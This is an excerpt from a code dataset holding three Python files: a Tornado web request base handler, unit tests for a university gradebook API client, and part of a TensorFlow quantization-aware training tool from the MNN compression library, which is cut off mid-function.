self.login_name = user.get('user_name', '')\n self.login_type = user.get('user_type', '')\n self.u_num = user.get('u_num', '')\n self.request = req\n self.ip = get_remote_ip(self)\n self.params = {}\n self.req_params = content\n self.user = user\n\n self.params = dict(\n user_agent=req.headers.get('User-Agent', ''), login_name=self.login_name,\n command=command, login_id=self.login_id, login_ip=get_remote_ip(self),\n u_num=self.u_num, url=req.path, content=json_dumps_util(content),\n login_type=self.login_type\n )\n\n self.result = dict(success=False, message='无效的请求!')\n\n\nclass BaseHandler(RequestHandler):\n def __init__(self, application, request, **kwargs):\n super(BaseHandler, self).__init__(application, request)\n self._http404_message = 'HTTPError: Error 404'\n self.result = dict(success=False, message='无效的请求!')\n self._command_func_dict = kwargs.get('command_func_dict', {})\n self._command_params_dict = kwargs.get('command_params_dict', {})\n self._after_send_func = kwargs.get('after_send_func', {})\n\n self._cookie_key = COOKIE_KEY\n self._cookie_kwargs = COOKIES_KWARGS\n\n self.user_agent = request.headers.get('User-Agent', '')\n # 请求参数\n self.req_params = {k: v[0] or '' for k, v in request.arguments.iteritems()}\n self.req = request\n self.command = self.req_params.get('command', '')\n self.host = request.host\n self.ip = get_remote_ip(self)\n self.user_dir = os.path.join(USER_FILES_PATH,self.current_user)\n self.project_dir = os.path.join(self.user_dir,'%s','project')\n\n def set_web_cookie(self, data, seconds=SESSION_VALID_TIME):\n if data:\n self.set_secure_cookie(self._cookie_key, json_dumps_util(data),\n **{'expires': datetime.utcnow() + timedelta(seconds=seconds)})\n\n def check_is_logon(self, cookie=None):\n if cookie is None:\n cookie = self.get_cookie_user()\n\n if cookie and isinstance(cookie, dict) and cookie.get('u_num', '') and cookie.get('user_id', ''):\n self.set_web_cookie(cookie)\n return True\n return False\n\n def get_cookie_user(self):\n cookie = {}\n try:\n cookie = json_loads_utf8_util(self.get_secure_cookie(self._cookie_key))\n if cookie:\n self.set_web_cookie(cookie)\n except:\n cookie = {}\n finally:\n return cookie\n\n def clear_cookie_and_redis(self, key, name_list=None):\n \"\"\"\n 清空 cookie 对应键值\n 删除 redis_cache 对应缓存数据 (可选)\n \"\"\"\n if name_list is not None and isinstance(name_list, list) and len(name_list) > 0:\n del_redis_cache(name_list)\n self.clear_cookie(key)\n\n def render_2(self, template_name, **kwargs):\n self.set_header(\"Cache-Control\", \"no-cache\")\n self.render(template_name, **kwargs)\n\n def update_page(self, client='web', page='index'):\n user = self.get_cookie_user().get('user_name', TEST_USER)\n config = get_config(user)\n html = self.render_string('template.html', user=user, config=config, page=page)\n folder = os.path.join(USER_FILES_PATH, user, client, 'html')\n if not os.path.exists(folder):\n os.makedirs(folder)\n path = os.path.join(folder, page + '.html')\n try:\n open(path, 'w').write(html)\n return True\n except:\n return False\n\n def render_by_user(self, template_name):\n user_agent = self.request.headers['User-Agent']\n client = 'web'\n if 'Android' in user_agent or 'iPhone' in user_agent:\n client = 'app'\n user = self.current_user\n folder = os.path.join(USER_FILES_PATH, user, client, 'html')\n path = os.path.join(folder, template_name)\n if user and os.path.exists(path):\n loader = template.Loader(folder)\n html = loader.load(template_name).generate()\n self.write(html)\n else:\n self.render(template_name)\n\n def get_current_user(self):\n return self.get_cookie_user().get('user_name', TEST_USER)\n\n def get(self, *args, **kwargs):\n if not self.current_user:\n url = self.request.uri\n redirect_url = url\n if '?' not in url:\n redirect_url = '/login' + '?next=' + url\n self.redirect(redirect_url)\n raise Finish()\n\n def post(self, *args, **kwargs):\n pass\n\n\nclass BaseCmsHandler(BaseHandler):\n def get(self, *args, **kwargs):\n pass\n\n def post(self, *args, **kwargs):\n # user = self.get_cookie_user()\n # if not (user and user.get('u_num', '')):\n # self.redirect_login('会话失效,请重新登入')\n # else:\n # self.command_info()\n self.command_info()\n user = self.get_cookie_user().get('user_name', TEST_USER)\n client = self.request.arguments.get('client', ['web'])[0]\n self.update_page(client)\n\n def redirect_login(self, msg=None):\n msg = msg or '会话失效,请重新登入'\n self.clear_cookie_and_redis(self._cookie_key)\n if str(self.request.method).upper() == 'POST':\n self.write(dict(success=False, message=msg))\n else:\n self.write(dict(success=True, message=msg))\n # self.redirect(LOGIN_PATH)\n\n def command_info(self):\n user = self.get_cookie_user()\n uris = str(self.request.path).split('/')\n module = uris[2] if uris else ''\n operate = uris[3] if len(uris) > 3 else ''\n command = self.req_params.get('command', '')\n command_dict = self._command_params_dict.get(module, {}).get(operate, {}).get(command, {})\n if command_dict:\n content = get_mutual_params(self.req_params, command_dict)\n result = dict(success=False, message='操作异常![-11]', error_code=0)\n if not isinstance(content, dict):\n result['message'] = content\n else:\n func = self._command_func_dict.get(command)\n if func:\n result = do_service_command(func, ParamsInfo(self.request, user, content, command))\n\n after_func = self._after_send_func.get(command)\n if after_func:\n after_func(self, result, self.req_params)\n else:\n self.write(result)\n else:\n self.write(self.result)\n","sub_path":"view/handler/base_handler.py","file_name":"base_handler.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"566868515","text":"# Copyright 2021 UW-IT, University of Washington\n# SPDX-License-Identifier: Apache-2.0\n\nfrom unittest import TestCase\nfrom uw_sws.section import get_section_by_label\nfrom uw_pws import PWS\nfrom uw_sws.util import fdao_sws_override\nfrom uw_pws.util import fdao_pws_override\nfrom uw_catalyst.util import fdao_catalyst_override\nfrom uw_catalyst.gradebook import *\nfrom uw_catalyst.exceptions import InvalidGradebookID\nimport mock\n\n\n@fdao_sws_override\n@fdao_pws_override\n@fdao_catalyst_override\nclass CatalystTestGradebook(TestCase):\n def test_invalid_gradebook_id(self):\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, None)\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, '')\n self.assertRaises(\n InvalidGradebookID, get_participants_for_gradebook, 'abc')\n self.assertRaises(\n InvalidGradebookID, get_gradebook_export, 00000)\n self.assertRaises(\n InvalidGradebookID, get_gradebook_export, 11111111111)\n\n @mock.patch('uw_catalyst.gradebook.get_resource')\n def test_gradebook_export(self, mock_fn):\n person = PWS().get_person_by_netid('bill')\n\n response = get_gradebook_export(12345, person)\n\n mock_fn.assert_called_with('/rest/gradebook/v1/book/12345/export', {\n 'Accept': 'application/vnd.ms-excel',\n 'X-UW-Act-as': 'bill'})\n\n def test_participants_for_gradebook(self):\n person = PWS().get_person_by_netid('bill')\n\n participants = get_participants_for_gradebook(12345, person)\n\n self.assertEquals(len(participants), 3, 'Correct participant count')\n\n def test_participants_for_section(self):\n section = get_section_by_label('2013,summer,CSS,161/A')\n instructor = section.meetings[0].instructors[0]\n\n participants = get_participants_for_section(section, instructor)\n\n self.assertEquals(len(participants), 3, 'Correct participant count')\n","sub_path":"uw_catalyst/tests/test_gradebook.py","file_name":"test_gradebook.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"648262000","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nfrom ..common import MNN_compression_pb2 as compress_pb\nimport mnncompress\nfrom mnncompress.common.log import mnn_logger\nfrom mnncompress.common.helper import get_pipeline_methods\nimport uuid\nfrom .helpers import get_input_tensor_index, is_weight_tensor, get_variable_by_tensor\nfrom .helpers import find_quant_output_tensor, find_bias_add_op, get_batch_norm_statistics, get_variable_by_name\nfrom .graph_checker import check_for_grad_ops\n\n\n_MNN_compress_scope = 'MNN_QAT_'\n\n_MNN_mark_start_name = 'MNN_QAT_MARK_START'\n_MNN_mark_end_name = 'MNN_QAT_MARK_END'\n\n_MNN_variable_collection_name = 'MNN_QAT_variables'\n\ndef MNN_QAT_variables():\n all_vars = tf.global_variables()\n return [v for v in all_vars if 'MNN_QAT' in v.name]\n\n_Quant_Support_Ops = ['Conv2D', 'DepthwiseConv2dNative', 'MatMul']\n\n_Variable_types = ['Variable', 'VariableV2']\n\n_MNN_QAT_DEBUG = False\n\n\ndef strip_MNN_QAT_ops(graph):\n '''only invoke this when you need to save the model for inference'''\n def get_MNN_QAT_scope(name, match):\n name_split = name.split('/')\n for i in range(len(name_split)):\n if name_split[i] == match:\n assert i > 0, \"get MNN QAT scope error\"\n return name_split[i-1]\n return ''\n\n all_ops = graph.get_operations()\n start_op_names = [op.name for op in all_ops if op.name.endswith(_MNN_mark_start_name) and op.type in ['Abs', 'RealDiv'] and 'gradients/' not in op.name]\n end_op_names = [op.name for op in all_ops if op.name.endswith(_MNN_mark_end_name+'/Merge') and op.type == 'Merge' and 'gradients/' not in op.name]\n\n for start_name in start_op_names:\n start_scope = get_MNN_QAT_scope(start_name, _MNN_mark_start_name)\n end_name = ''\n for end in end_op_names:\n if start_scope in end:\n end_name = end\n break\n assert end_name != '', \"error: end op name not found\"\n\n start_op = graph.get_operation_by_name(start_name)\n start_input_tensor = start_op.inputs[0]\n end_tensor = graph.get_tensor_by_name(end_name+':0')\n end_consumers = end_tensor.consumers()\n\n for c in end_consumers:\n indices = get_input_tensor_index(c, end_tensor)\n for id in indices:\n c._update_input(id, start_input_tensor)\n\ndef debug_print(*argv):\n if _MNN_QAT_DEBUG:\n print(\"debug info: \", end=\"\")\n for arg in argv:\n print(arg, end=' ')\n print()\n\ndef get_qat_state_placeholder(graph=None):\n if graph is None:\n graph = tf.get_default_graph()\n\n all_tensor_names = [tensor.name for op in graph.get_operations() for tensor in op.values()]\n for name in all_tensor_names:\n if 'MNN_QAT_is_training:0' in name:\n return graph.get_tensor_by_name(name)\n\n raise ValueError('Could not find QAT state placeholder')\n\n\nclass EMAQuantizer(object):\n def __init__(self, graph=None, is_training = None, skip_quant_layers = [], skip_quant_flag = [], bits = 8, debug_info = False, retain_sparsity=False):\n if graph is None:\n self._graph = tf.get_default_graph()\n else:\n self._graph = graph\n self._ops = self._graph.get_operations()\n self.skip_quant_layers = skip_quant_layers\n self.skip_quant_flag = skip_quant_flag\n self._all_conv_and_matmul_layers = [l for l in self._ops if l.type in _Quant_Support_Ops]\n self.quant_layer_names = [l.name for l in self._all_conv_and_matmul_layers]\n\n skip_flag_usable = False\n for sf in self.skip_quant_flag:\n for item in self.quant_layer_names:\n if sf in item:\n self.skip_quant_layers.append(item)\n skip_flag_usable = True\n \n if skip_quant_flag != [] and skip_flag_usable == False:\n raise ValueError(\"skip_quant_flag invalid\")\n\n for item in self.skip_quant_layers:\n if item in [l.name for l in self._all_conv_and_matmul_layers]:\n self.quant_layer_names.remove(item)\n else:\n raise ValueError(item+\" not found in graph ops, availables are: \"+str([l.name for l in self._all_conv_and_matmul_layers]))\n\n if bits < 2 or bits > 8:\n raise ValueError(\"bits must be a integer in [2, 8]\")\n self.bits = bits\n self._clamp_value = float(pow(2, bits-1) - 1)\n\n global _MNN_QAT_DEBUG\n _MNN_QAT_DEBUG = debug_info\n\n self._retain_sparsity = retain_sparsity\n self._momentum = 0.99\n if is_training is not None:\n if not isinstance(is_training, bool):\n raise ValueError(\"is_training should be None or python bool\")\n if isinstance(is_training, bool):\n self._is_training = tf.constant(is_training)\n else:\n print(\"is_training set as: tf.placeholder(tf.bool, name='MNN_QAT_is_training')\")\n self._is_training = tf.placeholder(tf.bool, name='MNN_QAT_is_training')\n self._original_tensor_consumer_index_map = {}\n self._quant_tensor_consumer_index_map = {}\n self._feature_scale_original_tensor_dims_map = {}\n self._weight_scale_original_tensor_map = {}\n self._model_per_layer_scale_info = []\n self._prune_weight_ops = []\n self._mask = {}\n self._all_weight_tensors = []\n self._feature_scale_init_op = {}\n self._op_scale_initialized = {}\n self._initialized = False\n self._layer_input_clamp_value = {}\n self._eps = 1e-9\n self._reported = False\n self._total_weight_num = 0.0\n self._remain_weight_num = 0.0\n self._init_prune_ratios = {}\n self._op_name_weight_tensor = {}\n self._skip_quant_weight_tensors = []\n self._find_all_variable_tensors()\n self._insert_quant_ops()\n\n @property\n def is_training(self):\n return self._is_training\n\n def init(self, sess):\n self._initialized = True\n\n for name in self.skip_quant_layers:\n if name in self._op_name_weight_tensor.keys():\n weight_tensor = self._op_name_weight_tensor[name]\n self._skip_quant_weight_tensors.append(weight_tensor)\n \n for v in self._all_weight_tensors:\n self._mask[v] = sess.run(self._mask[v])\n self._init_prune_ratios[v.name] = 1. - np.mean(self._mask[v])\n self._total_weight_num += self._mask[v].size\n if v in self._skip_quant_weight_tensors:\n self._remain_weight_num += self._mask[v].size * (1 - self._init_prune_ratios[v.name]) / 4.0\n else:\n self._remain_weight_num += self._mask[v].size * (1 - self._init_prune_ratios[v.name]) / (32.0 / self.bits)\n\n def update(self, sess):\n if not self._initialized:\n raise RuntimeError(\"EMAQuantizer is not initialized, please call 'init(sess)' method before training loop\")\n if self._retain_sparsity:\n sess.run(self._prune_weight_ops)\n if _MNN_QAT_DEBUG:\n for v in self._all_weight_tensors:\n weight = sess.run(v)\n prune_ratio = 1 - np.mean(np.abs(weight) > self._eps)\n print(v, \"prune_ratio:\", prune_ratio)\n\n def _generate_mask_and_prune_ops(self, v):\n if self._retain_sparsity:\n th = self._eps\n else:\n th = -1.0\n \n self._mask[v] = tf.cast(tf.abs(v) > th, tf.float32)\n\n if isinstance(v, tf.Tensor):\n return\n \n if self._retain_sparsity:\n prune_weight_op = tf.assign(v, v * self._mask[v])\n self._prune_weight_ops.append(prune_weight_op)\n\n def _find_all_variable_tensors(self):\n for op in self._all_conv_and_matmul_layers:\n if op.type in ['Conv2D', 'DepthwiseConv2dNative']:\n weight_tensor = get_variable_by_tensor(op.inputs[1])\n self._all_weight_tensors.append(weight_tensor)\n self._op_name_weight_tensor[op.name] = weight_tensor\n self._generate_mask_and_prune_ops(weight_tensor)\n\n if op.type == 'MatMul':\n find_weight = False\n for i in range(len(op.inputs)):\n input_tensor = op.inputs[i]\n if is_weight_tensor(input_tensor):\n find_weight = True\n weight_tensor = get_variable_by_tensor(input_tensor)\n self._all_weight_tensors.append(weight_tensor)\n self._op_name_weight_tensor[op.name] = weight_tensor\n self._generate_mask_and_prune_ops(weight_tensor)\n \n if not find_weight:\n if op.name in self.quant_layer_names:\n self.quant_layer_names.remove(op.name)\n print(\"no weight find for {}, skip\".format(op.name))\n\n def strip_qat_ops(self):\n '''only invoke this when you need to save the model for inference'''\n for tensor in self._original_tensor_consumer_index_map.keys():\n for index, consumer in self._original_tensor_consumer_index_map[tensor]:\n consumer._update_input(index, tensor)\n debug_print(\"on save:\", tensor.name, consumer.name, consumer.type, index)\n\n def save_compress_params(self, filename, sess, append=False):\n def get_save_tensor_name(name):\n if name.endswith(':0'):\n return name[:-2]\n else:\n return name\n\n compress_proto = compress_pb.Pipeline()\n\n if append:\n f = open(filename, 'rb')\n compress_proto.ParseFromString(f.read())\n\n pop_index = []\n for i in range(len(compress_proto.algo)):\n if compress_proto.algo[i].type == compress_pb.CompressionAlgo.CompressionType.QUANTIZE:\n pop_index.append(i)\n for i in pop_index:\n compress_proto.algo.pop(i)\n\n compress_proto.version = \"0.0.0\"\n if compress_proto.mnn_uuid == '':\n self._guid = str(uuid.uuid4())\n compress_proto.mnn_uuid = self._guid\n else:\n self._guid = compress_proto.mnn_uuid\n quant_algorithm = compress_proto.algo.add()\n for layer_info in self._model_per_layer_scale_info:\n l = quant_algorithm.quant_params.layer.add()\n # {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim}\n weight_info = layer_info[\"weight_info\"]\n input_info = layer_info[\"input_info\"]\n output_info = layer_info[\"output_info\"]\n\n if weight_info is not []:\n weight_params = compress_pb.LayerQuantizeParams.WeightParams()\n weight_params.name = get_save_tensor_name(get_variable_by_tensor(weight_info[0]).name)\n scales = sess.run(weight_info[1])\n scales = scales.reshape((scales.size))\n bn_stat = layer_info[\"bn_stat\"]\n\n gamma = np.ones_like(scales)\n if bn_stat[0] is not None:\n gamma = sess.run(bn_stat[0])\n gamma = gamma.reshape((gamma.size))\n rstd = np.ones_like(scales)\n if bn_stat[3] is not None:\n bn_var = sess.run(bn_stat[3])\n bn_var = bn_var.reshape((bn_var.size))\n rstd = 1. / np.sqrt(bn_var + bn_stat[4])\n scales = scales * gamma * rstd\n\n for s in scales:\n weight_params.scales.append(abs(s))\n weight_params.bits = self.bits\n weight_params.clamp_min = -int(self._clamp_value)\n weight_params.clamp_max = int(self._clamp_value)\n l.weight.append(weight_params)\n\n input_params = compress_pb.LayerQuantizeParams.ActivationParams()\n input_params.name = get_save_tensor_name(input_info[0].name)\n scale = sess.run(input_info[1]).tolist()\n debug_print(input_info[1].name, scale)\n # for count in range(input_info[2]):\n input_params.scales.append(scale)\n if len(input_info) == 4:\n clamp = sess.run(input_info[3]).tolist()\n input_params.clamp_min = -int(clamp)\n input_params.clamp_max = int(clamp)\n l.input.append(input_params)\n\n if len(input_info) == 6:\n input_params2 = compress_pb.LayerQuantizeParams.ActivationParams()\n input_params2.name = get_save_tensor_name(input_info[3].name)\n scale = sess.run(input_info[4]).tolist()\n debug_print(input_info[4].name, scale)\n for count in range(input_info[5]):\n input_params2.scales.append(scale)\n l.input.append(input_params2)\n \n output_params = compress_pb.LayerQuantizeParams.ActivationParams()\n output_params.name = get_save_tensor_name(output_info[0].name)\n scale = sess.run(output_info[1])\n debug_print(output_info[1].name, scale)\n # for count in range(output_info[2]):\n output_params.scales.append(scale)\n if len(output_info) == 4:\n clamp = sess.run(output_info[3]).tolist()\n output_params.clamp_min = -int(clamp)\n output_params.clamp_max = int(clamp)\n l.output.append(output_params)\n\n if not self._reported:\n detail = {\"algorithm\": \"EMAQ\", \"pipeline\": get_pipeline_methods(compress_proto), \"compression_rate\": self._total_weight_num / self._remain_weight_num, \\\n \"ori_model_size\": self._total_weight_num * 4.0 / 1024.0 / 1024.0, \\\n \"config\": {\"bits\": self.bits, \"skip_quant_layers\": self.skip_quant_layers, \"init_prune_ratios\": self._init_prune_ratios}}\n self._reported = mnn_logger.on_done(\"tensorflow\", self._guid, detail)\n\n with tf.gfile.Open(filename, mode=\"wb\") as f:\n f.write(compress_proto.SerializeToString())\n\n print(\"compress proto saved to:\", filename)\n\n def _recover_train_quant_graph(self):\n if self._quant_tensor_consumer_index_map == {}:\n return\n \n for tensor in self._quant_tensor_consumer_index_map.keys():\n for index, consumer in self._quant_tensor_consumer_index_map[tensor]:\n consumer._update_input(index, tensor)\n debug_print(\"on recover:\", consumer.name, consumer.type, index, tensor.name)\n\n def _insert_quant_ops(self):\n grad_ops = check_for_grad_ops(self._graph)\n if grad_ops:\n raise ValueError('gradient op found in graph, exiting %s\\nplease invoke with inference graph only. create quantizer before construct model optimizer\\n' % grad_ops)\n scope_index = -1\n for layer_name in self.quant_layer_names:\n if 'gradients/' in layer_name and '_grad' in layer_name:\n continue\n scope_index += 1\n self._quant_one_layer(layer_name, _MNN_compress_scope + str(scope_index))\n\n def _quant_one_layer(self, layer_name, scope):\n all_op_names_ops = {op.name : op for op in self._ops}\n if layer_name not in all_op_names_ops.keys():\n raise ValueError(\"%s is not in the graph.\" % layer_name)\n\n if all_op_names_ops[layer_name].type not in _Quant_Support_Ops:\n raise ValueError(\"op name: %s, type = %s is not supported.\" % (layer_name, all_op_names_ops[layer_name].type))\n\n if layer_name not in self._layer_input_clamp_value.keys():\n self._layer_input_clamp_value[layer_name] = None\n\n if all_op_names_ops[layer_name].type == 'Conv2D' or all_op_names_ops[layer_name].type == 'DepthwiseConv2dNative':\n print(\"fake quant\", layer_name, all_op_names_ops[layer_name].type)\n depthwise = False\n if all_op_names_ops[layer_name].type == 'DepthwiseConv2dNative':\n depthwise = True\n self._op_scale_initialized[all_op_names_ops[layer_name]] = {}\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n self._op_scale_initialized[all_op_names_ops[layer_name]]['input'] = tf.get_variable(name=layer_name+'_input_scale_initialized', initializer=0, trainable=False)\n self._op_scale_initialized[all_op_names_ops[layer_name]]['output'] = tf.get_variable(name=layer_name+'_output_scale_initialized', initializer=0, trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['input'])\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['output'])\n res = self._quant_conv(all_op_names_ops[layer_name], scope, depthwise)\n self._model_per_layer_scale_info.append(res)\n\n if all_op_names_ops[layer_name].type == 'MatMul':\n print(\"fake quant\", layer_name, all_op_names_ops[layer_name].type)\n self._op_scale_initialized[all_op_names_ops[layer_name]] = {}\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n self._op_scale_initialized[all_op_names_ops[layer_name]]['input'] = tf.get_variable(name=layer_name+'_input_scale_initialized', initializer=0, trainable=False)\n self._op_scale_initialized[all_op_names_ops[layer_name]]['output'] = tf.get_variable(name=layer_name+'_output_scale_initialized', initializer=0, trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['input'])\n tf.add_to_collection(_MNN_variable_collection_name, self._op_scale_initialized[all_op_names_ops[layer_name]]['output'])\n res = self._quant_matmul(all_op_names_ops[layer_name], scope)\n self._model_per_layer_scale_info.append(res)\n\n def _get_weight_variable_name(self, tensor):\n return tensor.op.inputs[0].op.name\n\n def _save_original_tensor_consumer_info(self, input_tensor, index, consumer_op):\n if input_tensor in self._original_tensor_consumer_index_map.keys():\n self._original_tensor_consumer_index_map[input_tensor].append([index, consumer_op])\n else:\n self._original_tensor_consumer_index_map[input_tensor] = [[index, consumer_op]]\n\n def _save_quant_tensor_consumer_info(self, input_tensor, index, consumer_op):\n if input_tensor in self._quant_tensor_consumer_index_map.keys():\n self._quant_tensor_consumer_index_map[input_tensor].append([index, consumer_op])\n else:\n self._quant_tensor_consumer_index_map[input_tensor] = [[index, consumer_op]]\n\n def _get_quant_scope(self, name, match):\n name_split = name.split(\"/\")\n return_scope = ''\n for i in range(len(name_split)):\n cond1 = _MNN_compress_scope in name_split[i]\n cond2 = match in name_split[i]\n if cond1 and cond2:\n for j in range(i+1):\n return_scope = return_scope + name_split[j] + '/'\n \n return return_scope[:-1]\n\n return return_scope\n\n def _quant_conv(self, conv2d_op, scope, depthwise):\n input_feature = conv2d_op.inputs[0]\n weight_tensor = conv2d_op.inputs[1]\n\n reduce_dims = [0, 1, 2]\n if depthwise:\n reduce_dims = [0, 1, 3]\n\n weight_tensor_scale = []\n input_scale_and_dim = []\n output_scale_and_dim = []\n\n input_scale = None\n weight_scales = None\n output_scale = None\n init_moving_scale_op = None\n\n if _MNN_compress_scope not in input_feature.name:\n conv2d_op_input, input_scale, dims, init_moving_scale_op = self._fake_quant_feature(input_feature, scope + '_input', conv2d_op, 'input')\n input_scale_and_dim.append(input_feature)\n input_scale_and_dim.append(input_scale)\n input_scale_and_dim.append(dims)\n conv2d_op._update_input(0, conv2d_op_input)\n self._save_quant_tensor_consumer_info(conv2d_op_input, 0, conv2d_op)\n self._save_original_tensor_consumer_info(input_feature, 0, conv2d_op)\n else:\n pre_output_scope = self._get_quant_scope(input_feature.name, '_output')\n pre_output_scale_name = pre_output_scope + '/moving_average_scale'\n pre_output_scale = get_variable_by_name(pre_output_scale_name)\n input_scale = pre_output_scale\n init_moving_scale_op = self._feature_scale_init_op[pre_output_scale]\n assert pre_output_scale in self._feature_scale_original_tensor_dims_map.keys()\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][0])\n input_scale_and_dim.append(pre_output_scale)\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][1])\n\n debug_print(\"pre_output_scale:\", pre_output_scale, pre_output_scale.name)\n debug_print(pre_output_scale in self._feature_scale_original_tensor_dims_map)\n debug_print(self._feature_scale_original_tensor_dims_map[pre_output_scale])\n debug_print(input_feature.name, \"feature already quant\")\n\n # if _MNN_compress_scope not in weight_tensor.name:\n new_weight_tensor, weight_scales = self._fake_quant_weight(weight_tensor, reduce_dims, scope + '_weight')\n weight_tensor_scale = [weight_tensor, weight_scales]\n conv2d_op._update_input(1, new_weight_tensor)\n self._save_quant_tensor_consumer_info(new_weight_tensor, 1, conv2d_op)\n self._save_original_tensor_consumer_info(weight_tensor, 1, conv2d_op)\n\n bias_add_op = find_bias_add_op(conv2d_op)\n if bias_add_op is not None:\n for index in range(len(bias_add_op.inputs)):\n input_tensor = bias_add_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(\"found bias:\", input_tensor.name, \"index:\", index)\n new_bias = self._fake_quant_bias(input_tensor, input_scale, weight_scales, scope + '_bias_' + str(index), init_moving_scale_op)\n bias_add_op._update_input(index, new_bias)\n self._save_quant_tensor_consumer_info(new_bias, index, bias_add_op)\n self._save_original_tensor_consumer_info(input_tensor, index, bias_add_op)\n\n output_tensor = find_quant_output_tensor(conv2d_op)\n output_consumers = output_tensor.consumers()\n # if _MNN_compress_scope not in output_consumers[0].name:\n new_output_tensor, output_scale, dims, init_moving_scale_op = self._fake_quant_feature(output_tensor, scope + '_output', conv2d_op, 'output')\n output_scale_and_dim.append(output_tensor)\n output_scale_and_dim.append(output_scale)\n output_scale_and_dim.append(dims)\n for c in output_consumers:\n index = get_input_tensor_index(c, output_tensor)\n for id in index:\n c._update_input(id, new_output_tensor)\n self._save_quant_tensor_consumer_info(new_output_tensor, id, c)\n self._save_original_tensor_consumer_info(output_tensor, id, c)\n\n input_scale_and_dim.append(tf.constant(self._clamp_value))\n output_scale_and_dim.append(tf.constant(self._clamp_value))\n\n bn_stat = get_batch_norm_statistics(conv2d_op)\n\n return {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim, \"bn_stat\": bn_stat}\n \n def _quant_matmul(self, matmul_op, scope):\n weight_tensor_scale = []\n input_scale_and_dim = []\n output_scale_and_dim = []\n\n input_scale = None\n weight_scales = None\n output_scale = None\n init_moving_scale_op = None\n\n for index in range(len(matmul_op.inputs)):\n input_tensor = matmul_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(input_tensor.name, \"is weight tensor\")\n # if _MNN_compress_scope not in input_tensor.name:\n reduce_dims = None\n trans_a = matmul_op.get_attr(\"transpose_a\")\n trans_b = matmul_op.get_attr(\"transpose_b\")\n if index == 0:\n if not trans_a:\n reduce_dims = [1]\n else:\n reduce_dims = [0]\n if index == 1:\n if not trans_b:\n reduce_dims = [0]\n else:\n reduce_dims = [1]\n\n new_weight_tensor, weight_scales = self._fake_quant_weight(input_tensor, reduce_dims, scope + '_weight_' + str(index))\n weight_tensor_scale = [input_tensor, weight_scales]\n matmul_op._update_input(index, new_weight_tensor)\n self._save_quant_tensor_consumer_info(new_weight_tensor, index, matmul_op)\n self._save_original_tensor_consumer_info(input_tensor, index, matmul_op)\n debug_print(\"weight quant updated\")\n else:\n debug_print(input_tensor.name, \"is input tensor\")\n if _MNN_compress_scope not in input_tensor.name:\n new_op_input, input_scale, dims, init_moving_scale_op = self._fake_quant_feature(input_tensor, scope + '_input_' + str(index), matmul_op, 'input')\n input_scale_and_dim.append(input_tensor)\n input_scale_and_dim.append(input_scale)\n input_scale_and_dim.append(dims)\n matmul_op._update_input(index, new_op_input)\n self._save_quant_tensor_consumer_info(new_op_input, index, matmul_op)\n self._save_original_tensor_consumer_info(input_tensor, index, matmul_op)\n debug_print(\"feature quant updated\")\n else:\n pre_output_scope = self._get_quant_scope(input_tensor.name, '_output')\n pre_output_scale_name = pre_output_scope + '/moving_average_scale'\n pre_output_scale = get_variable_by_name(pre_output_scale_name)\n input_scale = pre_output_scale\n init_moving_scale_op = self._feature_scale_init_op[pre_output_scale]\n assert pre_output_scale in self._feature_scale_original_tensor_dims_map.keys()\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][0])\n input_scale_and_dim.append(pre_output_scale)\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][1])\n\n debug_print(\"pre_output_scale:\", pre_output_scale, pre_output_scale.name)\n debug_print(pre_output_scale in self._feature_scale_original_tensor_dims_map)\n debug_print(self._feature_scale_original_tensor_dims_map[pre_output_scale])\n debug_print(input_tensor.name, \"feature already quant\")\n\n bias_add_op = find_bias_add_op(matmul_op)\n if bias_add_op is not None:\n for index in range(len(bias_add_op.inputs)):\n input_tensor = bias_add_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(\"found bias:\", input_tensor.name, \"index:\", index)\n new_bias = self._fake_quant_bias(input_tensor, input_scale, weight_scales, scope + '_bias_' + str(index), init_moving_scale_op)\n bias_add_op._update_input(index, new_bias)\n self._save_quant_tensor_consumer_info(new_bias, index, bias_add_op)\n self._save_original_tensor_consumer_info(input_tensor, index, bias_add_op)\n\n output_tensor = find_quant_output_tensor(matmul_op)\n output_consumers = output_tensor.consumers()\n # if _MNN_compress_scope not in output_consumers[0].name:\n new_output_tensor, output_scale, dims, init_moving_scale_op = self._fake_quant_feature(output_tensor, scope + '_output', matmul_op, 'output')\n output_scale_and_dim.append(output_tensor)\n output_scale_and_dim.append(output_scale)\n output_scale_and_dim.append(dims)\n for c in output_consumers:\n index = get_input_tensor_index(c, output_tensor)\n for id in index:\n c._update_input(id, new_output_tensor)\n self._save_quant_tensor_consumer_info(new_output_tensor, id, c)\n self._save_original_tensor_consumer_info(output_tensor, id, c)\n\n input_scale_and_dim.append(tf.constant(self._clamp_value))\n output_scale_and_dim.append(tf.constant(self._clamp_value))\n\n bn_stat = get_batch_norm_statistics(matmul_op)\n\n return {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim, \"bn_stat\": bn_stat}\n\n def _fake_quant_bias(self, bias_tensor, input_scale, weight_scales, scope, init_moving_scale_op):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n with 